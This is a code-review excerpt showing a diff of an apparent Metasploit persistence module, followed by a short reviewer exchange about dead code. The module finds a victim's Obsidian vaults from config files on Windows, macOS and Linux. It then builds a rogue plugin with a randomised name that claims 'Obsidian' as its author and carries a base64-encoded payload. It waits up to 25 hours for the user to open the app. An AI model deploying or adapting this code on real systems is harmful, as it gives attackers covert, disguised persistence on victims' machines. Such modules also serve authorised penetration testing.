modules/exploits/multi/local/obsidian_plugin_persistence.rb

```diff
@@ -0,0 +1,243 @@
+        ],
+        'Arch' => [ARCH_CMD],
+        'Platform' => %w[osx linux windows],
+        'DefaultOptions' => {
+          # 25hrs, you know, just in case the user doesn't open Obsidian for a while
+          'WfsDelay' => 90_000,
+          'PrependMigrate' => true
+        },
+        'Targets' => [
+          ['Auto', {} ],
+          ['Linux', { 'Platform' => 'unix' } ],
+          ['OSX', { 'Platform' => 'osx' } ],
+          ['Windows', { 'Platform' => 'windows' } ],
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]
+        },
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options([
+      OptString.new('NAME', [ false, 'Name of the plugin', '' ]),
+      OptString.new('USER', [ false, 'User to target, or current user if blank', '' ]),
+      OptString.new('CONFIG', [ false, 'Config file location on target', '' ]),
+    ])
+  end
+
+  def plugin_name
+    return datastore['NAME'] unless datastore['NAME'].empty?
+
+    rand_text_alphanumeric(4..10)
+  end
+
+  def find_vaults
+    vaults_found = []
+    user = target_user
+    vprint_status("Target User: #{user}")
+    case session.platform
+    when 'windows', 'win'
+      config_files = ["C:\\Users\\#{user}\\AppData\\Roaming\\obsidian\\obsidian.json"]
+    when 'osx'
+      config_files = ["/User/#{user}/Library/Application Support/obsidian/obsidian.json"]
+    when 'linux'
+      config_files = [
+        "/home/#{user}/.config/obsidian/obsidian.json",
+        "/home/#{user}/snap/obsidian/40/.config/obsidian/obsidian.json"
+      ] # snap package
+    end
+
+    config_files.unshift(datastore['CONFIG']) unless datastore['CONFIG'].empty?
+
+    config_files.each do |config_file|
+      next unless file?(config_file)
+
+      vprint_status("Found user obsidian file: #{config_file}")
+      config_contents = read_file(config_file)
+      return fail_with(Failure::Unknown, 'Failed to read config file') if config_contents.nil?
+
+      vaults = JSON.parse(config_contents)
+      vaults_found = vaults['vaults']
+      vaults['vaults'].each do |k, v|
+        if v['open']
+          print_good("Found #{v['open'] ? 'open' : 'closed'} vault #{k}: #{v['path']}")
+        else
+          print_status("Found #{v['open'] ? 'open' : 'closed'} vault #{k}: #{v['path']}")
+        end
+      end
+      return vaults_found
+    end
+
+    vaults_found
+  end
+
+  def manifest_js(plugin_name)
+    JSON.pretty_generate({
+      'id' => plugin_name.gsub(' ', '_'),
+      'name' => plugin_name,
+      'version' => '1.0.0',
+      'minAppVersion' => '0.15.0',
+      'description' => '',
+      'author' => 'Obsidian',
+      'authorUrl' => 'https://obsidian.md',
+      'isDesktopOnly' => false
+    })
+  end
+
+  def main_js(_plugin_name)
+    Rex::Text.encode_base64(payload.encoded)
```

Comment:
Is this intentional?
Feels like the return value is not used here at all.
Or is this dead code?

Reply:
dead code from trying to get the payload to work at one point, good catch